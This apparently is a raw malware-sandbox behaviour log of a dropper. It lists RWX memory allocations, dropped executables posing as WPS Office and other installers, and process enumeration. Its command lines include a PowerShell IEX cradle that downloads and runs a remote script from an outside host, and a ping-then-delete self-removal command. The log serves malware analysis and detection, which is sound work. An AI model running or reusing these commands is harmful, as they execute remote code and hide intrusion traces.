heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000048f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2384
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2384
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2384
region_size: 53248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00440000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2524
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 77824
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d0e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2524
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ae0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ac1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11953926144
free_bytes_available: 0
root_path: C:
total_number_of_bytes: 0
1 1 0
regkey .*Kingsoft
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\extensibility.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\stdole.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS438C.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS4689.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS4D99.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WidgetsKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qwindows.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\API-MS-Win-core-xstate-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\printsupport\windowsprintersupport.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qdirect2d.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_codecvt_ids.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_2.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\concrt140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\73456c80a6\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
file C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
file C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\gdiplus.dll
file C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\System.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\staticlittlesource[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5CoreKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WinExtrasKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\AccessControl.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\setup[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll
file C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AAAd1[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\clip64[1].dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\toolspub1[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll
wmi SELECT * FROM Win32_Processor
wmi <INVALID POINTER>
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000009c
process_name: pw.exe
process_identifier: 988
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: SearchIndexer.exe
process_identifier: 1160
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: pw.exe
process_identifier: 2336
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: taskhost.exe
process_identifier: 2528
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: jbruyer.exe
process_identifier: 2788
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: cmd.exe
process_identifier: 2720
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: conhost.exe
process_identifier: 2868
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: powershell.exe
process_identifier: 2956
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: WmiPrvSE.exe
process_identifier: 2636
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: WPSOffice_11.exe
process_identifier: 1656
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: WPSOffice_11.exe
process_identifier: 2056
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: rundll32.exe
process_identifier: 2124
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: rundll32.exe
process_identifier: 1668
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: rundll32.exe
process_identifier: 2248
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: svchost.exe
process_identifier: 2952
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: WerFault.exe
process_identifier: 2484
1 1 0

Process32NextW

 snapshot_handle: 0x000000f4
process_name: WPSOffice_11.exe
process_identifier: 560
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
